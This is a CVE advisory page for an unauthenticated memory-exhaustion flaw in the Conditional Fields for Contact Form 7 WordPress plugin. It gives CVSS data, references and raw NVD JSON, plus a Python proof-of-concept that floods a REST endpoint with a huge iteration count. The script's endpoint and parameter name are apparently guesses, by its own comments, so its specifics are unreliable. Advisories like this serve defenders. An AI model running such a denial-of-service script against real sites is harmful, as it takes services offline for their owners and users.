CVE-2026-25863

Description

Conditional Fields for Contact Form 7 WordPress plugin through version 2.6.7 contains an uncontrolled resource consumption vulnerability in the Wpcf7cfMailParser class where the hide_hidden_mail_fields_regex_callback() method reads an iteration count directly from user-supplied POST parameters without validation or upper bound enforcement. Unauthenticated attackers can supply an arbitrarily large integer value through the REST API endpoint to cause unbounded loop execution with multiple preg_replace() operations, exhausting server memory and crashing the PHP process.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Conditional Fields for Contact Form 7 <= 2.6.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Conditional Fields for Contact Form 7 - Uncontrolled Resource Consumption (DoS)
# Description: Sends a malicious request with a large iteration count to trigger a DoS.

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://target-wordpress-site.com/wp-json/cf7-conditional-fields/v1/process"

# The vulnerability relies on a specific POST parameter controlling loop iterations.
# Attackers supply an arbitrarily large integer to exhaust memory.
payload = {
    # Parameter name may vary based on plugin implementation details,
    # typically related to 'count', 'iterations', or form field processing.
    "iteration_count": 999999999, 
    "form_data": "test"
}

headers = {
    "User-Agent": "CVE-2026-25863-Scanner",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    print(f"[+] Sending payload to {target_url}...")
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    print(f"[+] Request sent. Status Code: {response.status_code}")
    print("[!] Server may now be unresponsive due to memory exhaustion.")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed or server crashed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25863
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25863
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25863/
[4] VulDB https://vuldb.com/cve/CVE-2026-25863
[5] https://wordpress.org/plugins/cf7-conditional-fields/#developers
[6] https://www.vulncheck.com/advisories/conditional-fields-for-contact-form-7-dos-via-uncontrolled-resource-consumption

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25863", "sourceIdentifier": "[email protected]", "published": "2026-05-04T19:16:02.953", "lastModified": "2026-05-05T19:47:57.367", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Conditional Fields for Contact Form 7 WordPress plugin through version 2.6.7 contains an uncontrolled resource consumption vulnerability in the Wpcf7cfMailParser class where the hide_hidden_mail_fields_regex_callback() method reads an iteration count directly from user-supplied POST parameters without validation or upper bound enforcement. Unauthenticated attackers can supply an arbitrarily large integer value through the REST API endpoint to cause unbounded loop execution with multiple preg_replace() operations, exhausting server memory and crashing the PHP process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://wordpress.org/plugins/cf7-conditional-fields/#developers", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/conditional-fields-for-contact-form-7-dos-via-uncontrolled-resource-consumption", "source": "[email protected]"}]}}